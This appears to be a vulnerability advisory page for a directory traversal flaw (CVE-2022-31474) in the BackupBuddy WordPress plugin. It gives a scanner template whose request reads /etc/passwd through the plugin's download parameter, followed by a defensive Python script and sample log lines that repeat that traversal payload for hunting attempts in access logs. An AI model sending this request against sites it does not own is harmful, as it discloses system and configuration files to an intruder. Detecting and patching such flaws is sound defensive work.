CVE-2022-31474

Date: 2025-09-01 | Affected software: CVE-2022-31474 | PoC: public

Vulnerability description

Directory traversal vulnerability in the iThemes BackupBuddy plugin, versions 8.5.8.0 through 8.7.4.1.

PoC code [public]

# xray-style scanner template: one GET request, matched on status and body content
id: CVE-2022-31474

info:
  name: CVE-2022-31474
  author: zhizhuo
  severity: high
  verified: true
  description: |
    iThemes BackupBuddy 插件 8.5.8.0 - 8.7.4.1 版本中的目录遍历漏洞。
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474

rules:
  verify:
    request:
      method: GET
      # the local-download parameter is passed to the plugin's file download handler unsanitized
      path: /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=wp-config&local-download=/etc/passwd
    # a 200 response whose body looks like a passwd file indicates an unpatched install
    expression: response.status == 200 && response.body.bcontains(b'/bin/bash') && response.body.bcontains(b'root')
expression: verify()
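For defenders, the request shape in the template above is easy to hunt for in web-server access logs. The following Python script is an added example, not part of the original page or the plugin's code: it parses combined-format access-log lines, isolates requests to the BackupBuddy destinations page, and flags any `local-download` value that is an absolute path or contains a `../` segment (after URL decoding, including double encoding), while recording whether the server answered 200 or blocked the request. The log lines, client IPs and file sizes are constructed sample data; the log format regex and the field names in the findings are assumptions of this example.

```python
"""Hunt for BackupBuddy local-download path traversal attempts in access logs (added example)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined" log format; an assumption of this example, adjust to your own format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (not real traffic). Lines 1 and 3 are traversal attempts that
# were served, line 4 is the same attempt blocked by a WAF, lines 2 and 5 are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Sep/2025:10:00:01 +0000] "GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=wp-config&local-download=/etc/passwd HTTP/1.1" 200 1432
198.51.100.7 - - [01/Sep/2025:10:00:02 +0000] "GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=1&local-download=backup-2025.zip HTTP/1.1" 200 99231
203.0.113.5 - - [01/Sep/2025:10:00:03 +0000] "GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=1&local-download=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1432
192.0.2.9 - - [01/Sep/2025:10:00:04 +0000] "GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=1&local-download=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 403 0
192.0.2.9 - - [01/Sep/2025:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 512
"""


def is_traversal_value(value: str) -> bool:
    """True if a local-download value escapes the backup directory.

    parse_qs already decodes one layer of percent-encoding; decoding twice more
    catches double-encoded variants such as ..%252F. Backslashes are normalized
    so Windows-style separators are treated the same as '/'.
    """
    decoded = unquote(unquote(value))
    normalized = decoded.replace("\\", "/")
    return (
        normalized.startswith("/")
        or normalized.startswith("..")
        or "/../" in normalized
        or "/.." in normalized
    )


def parse_line(line: str):
    """Return the named fields of one combined-format log line, or None if it does not match."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def find_backupbuddy_traversal(log_text: str):
    """Return one finding per request that targets the BackupBuddy destinations page
    with a traversal-looking local-download value."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if not url.path.endswith("/wp-admin/admin-post.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if params.get("page", [""])[0] != "pb_backupbuddy_destinations":
            continue
        for value in params.get("local-download", []):
            if is_traversal_value(value):
                findings.append({
                    "ip": rec["ip"],
                    "timestamp": rec["ts"],
                    "status": int(rec["status"]),
                    "local_download": unquote(value),
                    # a 200 means the server handed the file back: treat as a likely exposure
                    "served": rec["status"] == "200",
                })
    return findings


def summarize(findings):
    """Count served versus blocked attempts and the distinct source IPs involved."""
    served = sum(1 for f in findings if f["served"])
    return {
        "total": len(findings),
        "served": served,
        "blocked": len(findings) - served,
        "sources": sorted({f["ip"] for f in findings}),
    }


if __name__ == "__main__":
    hits = find_backupbuddy_traversal(SAMPLE_LOG)
    for hit in hits:
        print(hit)
    print(summarize(hits))
```

Any finding with `served` set should be treated as a probable disclosure on an unpatched install (versions in the affected range above) and the plugin updated; findings with a non-200 status show the attempt was blocked but still identify sources worth watching.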
